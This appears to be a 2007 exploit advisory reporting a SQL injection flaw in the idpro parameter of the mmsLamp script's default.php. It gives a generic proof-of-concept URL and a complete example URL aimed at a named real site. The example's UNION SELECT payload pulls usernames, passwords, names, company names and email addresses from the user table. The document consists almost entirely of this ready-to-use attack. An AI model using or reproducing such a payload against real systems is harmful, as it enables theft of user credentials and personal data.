Name : mmsLamp SQL Injection Vulnerability.
Author : x0kster
Email : x0kster@gmail.com
Script Page : http://www.brand039.com/?service=prodotti_dettaglio&idpro=4
Date : 22/12/2007
Bug in : default.php
PoC : http://site.com/default.php?service=prodotti_dettaglio&idpro=[SQL]
Example:
http://www.brand039.com/default.php?service=prodotti_dettaglio&idpro=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,concat(username,0x3a,password,0x3a,nome,0x3a,cognome,0x3a,azienda,0x3a,email),20,21,22+from+mms_extranet_utenti+where+id=1/*
# milw0rm.com [2007-12-23]